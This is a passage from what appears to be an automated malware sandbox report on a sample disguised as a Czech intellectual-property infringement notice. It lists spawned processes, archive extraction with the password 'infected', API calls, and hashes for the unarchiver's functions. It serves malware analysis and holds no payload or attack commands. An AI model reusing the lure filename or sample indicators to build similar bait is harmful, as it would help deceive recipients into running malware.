Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:50:07
Start date:	26/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"
Imagebase:	0x2a0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:50:07
Start date:	26/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:50:07
Start date:	26/03/2025
Path:	C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
Imagebase:	0x400000
File size:	6'365'288 bytes
MD5 hash:	4864A55CFF27F686023456A22371E790
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:50:45
Start date:	26/03/2025
Path:	C:\Windows\SysWOW64\unarchiver.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
Imagebase:	0xb80000
File size:	12'800 bytes
MD5 hash:	16FF3CC6CC330A08EED70CBC1D35F5D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	14:50:45
Start date:	26/03/2025
Path:	C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
Imagebase:	0xc0000
File size:	289'792 bytes
MD5 hash:	77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:50:46
Start date:	26/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	22.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.5%
Total number of Nodes:	73
Total number of Limit Nodes:	4

Callgraph

Hide Legend

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 014FB1D6 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 014FB208

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 2d3a9dce807c2b170d45d7d78956f1a82d2d7d02a5f037d22d16d15f81080340
Instruction ID: bf1344dc043f150cdc9ca2ceb994568fee17db9dd20b61bd2f421983ca2f2779
Opcode Fuzzy Hash: 2d3a9dce807c2b170d45d7d78956f1a82d2d7d02a5f037d22d16d15f81080340
Instruction Fuzzy Hash: 2901A2758042409FDB10DF55D989766FBE4DF05620F08C4AFDE088F352D379A404CB62

Function 014FB246 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FB2F3

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1a16c4198e213e561c92c65f700bbfedcd589748acc8ccfc9a4755ffe3264447
Instruction ID: dcb81f75c27765d864c73cdf3cd7144b57f226f21382e80e8a0ece838f650f6f
Opcode Fuzzy Hash: 1a16c4198e213e561c92c65f700bbfedcd589748acc8ccfc9a4755ffe3264447
Instruction Fuzzy Hash: 0C31A172404344AFEB228B61DC45FA7BFBCEF06610F04889AF985CB162D324A9099B71

Function 014FAD04 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FADA7

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b3e942db9af2c7e35b6ef4d8f756e4614b398333016e87fc0a272c65951bd386
Instruction ID: 2b01970c319ba63144fb1481d87936eb917841c69c105f8dd0560a6dee84a875
Opcode Fuzzy Hash: b3e942db9af2c7e35b6ef4d8f756e4614b398333016e87fc0a272c65951bd386
Instruction Fuzzy Hash: 1431CF72404344AFEB228B25DC45FA7BFBCEF05220F08889EF985CB162D324A509CB61

Function 014FAB76 Relevance: 1.6, APIs: 1, Instructions: 93
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 014FAC36

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: 9ddbc2c93cd29283645a0b15f6423ab0ff43c5cca81952be1166ce91ccd9edbc
Instruction ID: 4829060384ab8b8bcb0977068fe305565fbf588823528423c37f1ffbbe6930fc
Opcode Fuzzy Hash: 9ddbc2c93cd29283645a0b15f6423ab0ff43c5cca81952be1166ce91ccd9edbc
Instruction Fuzzy Hash: A3316F7250E3C06FD3038B718C65A66BFB4AF47610F1A85CBD884DF1A3D269A919C762

Function 014FA5DC Relevance: 1.6, APIs: 1, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 014FA67D

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 11e1a9ef27077b1c7942be6a8baa457513408683f9893d45b305f0981f4bac69
Instruction ID: 12ba3ff236b187bed60cbbfab1500ec33db8580e6ea1a467405bf999340e9e93
Opcode Fuzzy Hash: 11e1a9ef27077b1c7942be6a8baa457513408683f9893d45b305f0981f4bac69
Instruction Fuzzy Hash: A6317E71505340AFE722CF25DD45F66BFE8EF45220F08889EEA898B262D375E409CB71

Function 014FA120 Relevance: 1.6, APIs: 1, Instructions: 82
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 014FA1C2

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 365d25e805ed3b1dd79296e85232605c97b4ffdbd411d2686f4ab74c1b6a6e8e
Instruction ID: c638181e0f76109971fb7681997f04ee50ffb853f6245c941cc301682a4e570e
Opcode Fuzzy Hash: 365d25e805ed3b1dd79296e85232605c97b4ffdbd411d2686f4ab74c1b6a6e8e
Instruction Fuzzy Hash: 3B21A17140D3C06FD3128B258C55BA6BFB4EF47610F1985CBE8848F593D329A919D7A2

Function 014FB276 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FB2F3

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: de5aad2c89f3c4a71c8b2ba8357b122cff6a159781cf77cda29bde2ff8d0e9bb
Instruction ID: 126f20ad92d6ddeee095a3147f1af2a93e37ec99cf97fac6c7a5a4011e884c32
Opcode Fuzzy Hash: de5aad2c89f3c4a71c8b2ba8357b122cff6a159781cf77cda29bde2ff8d0e9bb
Instruction Fuzzy Hash: 3B21C472500204AFEB219F65DC45F6BBBECEF04714F04896EFA458B251D774E5448BA1

Function 014FA370 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA40C

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 645ccacd71bcec2d5a8213100b40da8e838a1659270b790ad2572484137355b3
Instruction ID: d5e7e3969816378492426eab9873695ffe96f71ff8cf47905eceb2a8bed66aca
Opcode Fuzzy Hash: 645ccacd71bcec2d5a8213100b40da8e838a1659270b790ad2572484137355b3
Instruction Fuzzy Hash: AD216D76504744AFE721CF15DC84FA7BBF8EF05610F18849AEA89CB262D364E948CB61

Function 014FAD2A Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FADA7

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 873fe6b18c16468d119e339c776d4371e3500f37199045a6d29ded3b71bd8921
Instruction ID: e4a5db62b684b0ca66f8658e9b3be7e192e608336825c13585aec6aba9400f7d
Opcode Fuzzy Hash: 873fe6b18c16468d119e339c776d4371e3500f37199045a6d29ded3b71bd8921
Instruction Fuzzy Hash: D121F172400204AFEB218F65DD45FABFBECEF04324F04886EFA458B252D734E5498BA1

Function 014FA850 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA8DE

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8d9b4c2e32e2cdc7ccb0303d78c1d12e03fe49385aac65a261b5a317e2204f81
Instruction ID: 0f941c27b738810eb103b1076928b6e09affa4861f15ed28054d5b2acf79ab42
Opcode Fuzzy Hash: 8d9b4c2e32e2cdc7ccb0303d78c1d12e03fe49385aac65a261b5a317e2204f81
Instruction Fuzzy Hash: 4821A471409380AFE7228F25DC45FA6BFB8EF46714F0988EBF9848B153D265A909C771

Function 014FA933 Relevance: 1.6, APIs: 1, Instructions: 77
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA9C1

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0cf121e6e23903a34db434327e74b977086d0deb051ead5af3bfecdbed17fdf3
Instruction ID: 59474c4ccbb89022c386fbdc67e7d6f121187d9f6a802dc35ff352cc9b6b125d
Opcode Fuzzy Hash: 0cf121e6e23903a34db434327e74b977086d0deb051ead5af3bfecdbed17fdf3
Instruction Fuzzy Hash: 1321A371409380AFDB22CF25DC45F97BFB8EF06614F08849AE9858B153C375A548CBB1

Function 014FA5FE Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 014FA67D

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 12cbb81dd41992460af8946288daa7015289766b688c4115c7c746d82b2eae3f
Instruction ID: 6112267edc146888079af48bb27cc11fc644a5f256254edbb9778fd0f984b5d8
Opcode Fuzzy Hash: 12cbb81dd41992460af8946288daa7015289766b688c4115c7c746d82b2eae3f
Instruction Fuzzy Hash: D7219071500200AFEB21DF65DD45F67FBE8EF08610F18886EEA898B362D375E408CB61

Function 014FA78F Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA815

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 31356526e827c8acb6beb34c93625a315badda51bd32094dd19a4421f4ca8e37
Instruction ID: ae1fbc0e32c60d900ed506cd3dea3b01330b888629df4dcf123bd510dea1a04b
Opcode Fuzzy Hash: 31356526e827c8acb6beb34c93625a315badda51bd32094dd19a4421f4ca8e37
Instruction Fuzzy Hash: DF21D5B54093806FE7128B21DC45BA3BFB8DF47714F0880DBF9858B293D268A909C775

Function 014FAA0B Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 014FAA8B

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 877eb27e762c9bc66eed07c93b89191d1301e5359375b3b3372779673a16a613
Instruction ID: cf0a8be843807172f3a5302614af1e3e5c2c322c2e4e23f6033d91025d456449
Opcode Fuzzy Hash: 877eb27e762c9bc66eed07c93b89191d1301e5359375b3b3372779673a16a613
Instruction Fuzzy Hash: 5021A4715083805FD712CB29DC55B93BFE8AF06314F0D84EAD984CB253D224D909C761

Function 014FA392 Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA40C

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2e43fd11792e6f2174f08fc6e1bbbaf0e2b53251b02813ec38761db6bc86a9e7
Instruction ID: af2c34e411cc66d29281befb4cfaa070fb070ace8b97c452279f6419ba8ad61e
Opcode Fuzzy Hash: 2e43fd11792e6f2174f08fc6e1bbbaf0e2b53251b02813ec38761db6bc86a9e7
Instruction Fuzzy Hash: 6A218E75500604AFE721CF25DC89F67BBECEF04610F18846AEA4A8B362D374E949CA71

Function 014FA962 Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA9C1

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e280fe42eba66c62fa8c9816fa4b33f5656bfd34600aed509af76a33b73cfa19
Instruction ID: 93f44c3c7d3ec7d6a3d041e4a3bc542c2dfc588acd39b75199930d22c4a9dc5c
Opcode Fuzzy Hash: e280fe42eba66c62fa8c9816fa4b33f5656bfd34600aed509af76a33b73cfa19
Instruction Fuzzy Hash: 1E11C475400200AFEB21CF65DD45F67FBE8EF04724F14886AEA498B252D375A548CBB1

Function 014FA882 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA8DE

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2d465a2bbef31675bbaf25391279ea3028ebee3ba910ce7f24493a5778f9aecb
Instruction ID: 4c2cdd72e9e5a2d3302750b8a3a9bc74b77b901d79753bbbf8984529b610b658
Opcode Fuzzy Hash: 2d465a2bbef31675bbaf25391279ea3028ebee3ba910ce7f24493a5778f9aecb
Instruction Fuzzy Hash: 3111E371400200AFEB21CF65DD45F67FBE8EF44724F14886BEA498B252D374A5458BB2

Function 014FA2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 014FA30C

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c2d23591b324c5e4bdade4fd03e7b3e8d5574624b4a7e8e9be0eb8efd4b75b9b
Instruction ID: 02dc7c0467e9d9704267a56920f8cb89be424a44f42bd9b59b9b5a05bfdbcb8e
Opcode Fuzzy Hash: c2d23591b324c5e4bdade4fd03e7b3e8d5574624b4a7e8e9be0eb8efd4b75b9b
Instruction Fuzzy Hash: A8115E758097C09FDB228B25DC94A52BFB4DF07224F0984DBD9858F263D275A909CB72

Function 014FAA46 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 014FAA8B

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 01892eeae40cae8dda8cc9d3f60f0a10d8fd57f9450e92128636003afbbd4bc6
Instruction ID: af32c275e80cf69f54dfd80ddf05b6cf9d745eab5314a94ccdea02234f31f2a6
Opcode Fuzzy Hash: 01892eeae40cae8dda8cc9d3f60f0a10d8fd57f9450e92128636003afbbd4bc6
Instruction Fuzzy Hash: CE115271A042409FEB10CF69D985757BBD8EF04610F18C4AEDE09CB352E375D548CA61

Function 014FA7C2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA815

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b69a9c35991f22287dd9781c3da0915c437f963021ded75235dadb15b5f5363c
Instruction ID: 3ce7f731c986786a2ae4089f8f04e81e7ccac489a8d73f728e41af36ea174f00
Opcode Fuzzy Hash: b69a9c35991f22287dd9781c3da0915c437f963021ded75235dadb15b5f5363c
Instruction Fuzzy Hash: AE01F975504200AEE720CF15DC45BA7FBE8DF04724F14C05BEE498B352D3B8E5458AB6

Function 014FAF8B Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 014FAFE4

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 1df03a43f0c27f05046ca15f9f324e912526a5d02366f6735d3b613cc7e03b0f
Instruction ID: 67f81adeee43fbbbd29c82ad9c126ec137216e06b06f777c6833b3e57dfff24e
Opcode Fuzzy Hash: 1df03a43f0c27f05046ca15f9f324e912526a5d02366f6735d3b613cc7e03b0f
Instruction Fuzzy Hash: 31119EB15093809FDB128F25DC85A52BFF4EF06220F0984DBE9858B263D274A808DB62

Function 014FB1B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 014FB208

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 8ff697b47ed89f1880afe5ab5b429f950e1eb4cdb1bda3aa1345ccaeb36547bd
Instruction ID: 210ede990c9a2202f487e1724cbf941825842db94390a01598771591e98882f7
Opcode Fuzzy Hash: 8ff697b47ed89f1880afe5ab5b429f950e1eb4cdb1bda3aa1345ccaeb36547bd
Instruction Fuzzy Hash: E6117C754093809FDB12CF25DC88B56BFB4DF46220F0884EBED848F263D275A908CB62

Function 014FABE6 Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 014FAC36

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: da685bea4671c17a545187444b3208ed6be89af04667b1d9ad26feb694c43c90
Instruction ID: d5d871730aaa529d945fc5867ace8cb28830045e75342dcbe82cae13514f1688
Opcode Fuzzy Hash: da685bea4671c17a545187444b3208ed6be89af04667b1d9ad26feb694c43c90
Instruction Fuzzy Hash: 8C017172900200ABD310DF26DD86B26FBE8FB88B20F14855AED089B641D735F915CBE5

Function 014FA172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 014FA1C2

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 24c1dea03a52422a66ffe7dfdf8bb417c74f09027962fa56a593793cc1a35bf5
Instruction ID: a5f71d441523566e1f61efede8f38c08c774f23e1182cbdf23199944f1edff9d
Opcode Fuzzy Hash: 24c1dea03a52422a66ffe7dfdf8bb417c74f09027962fa56a593793cc1a35bf5
Instruction Fuzzy Hash: 31017172900200ABD710DF26DD86B26FBE8EB88A20F14855AED089B641D735F915CBE5

Function 014FAFB2 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 014FAFE4

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 55c024a8a794fc049bdc364754d8e7c9516a83b76636861cca0251abd7362488
Instruction ID: 21ca62b0639b5566416d7879427f4774fb56db821c3be88a4804a656a10e8883
Opcode Fuzzy Hash: 55c024a8a794fc049bdc364754d8e7c9516a83b76636861cca0251abd7362488
Instruction Fuzzy Hash: 9601F4B55002409FDB108F29D885762FBE4EF05220F08C0AFDE098F3A2D379E844DEA2

Function 014FA2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 014FA30C

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f7dfef18f8e499845d224db74846e84c569fb10523d7e6505f8a3405d6d5bcca
Instruction ID: 8c6662da8c04cfcec9bb791a152914c2ebdb6794300c35b0fc8851c0104c02b5
Opcode Fuzzy Hash: f7dfef18f8e499845d224db74846e84c569fb10523d7e6505f8a3405d6d5bcca
Instruction Fuzzy Hash: 35F0AF758042409FEB20DF15D885762FBE0EF04624F18C09ADE094B362D3B9A404CEA2

Function 014FA6D4 Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 014FA748

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8ff894508e8bb39714ca2641db1e509f7a14535647a696c29bec02c70e4bf103
Instruction ID: bf61db7577e130ae3691c186a492cdcbc901cde0cf290768c8e03f4a2dd46021
Opcode Fuzzy Hash: 8ff894508e8bb39714ca2641db1e509f7a14535647a696c29bec02c70e4bf103
Instruction Fuzzy Hash: 9521B0B59097C05FDB128B25DC95792BFB4EF02320F1984DBDC858B2A3D2249908C762

Function 014FA716 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 014FA748

Memory Dump Source

Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false

Joe Sandbox IDA Plugin

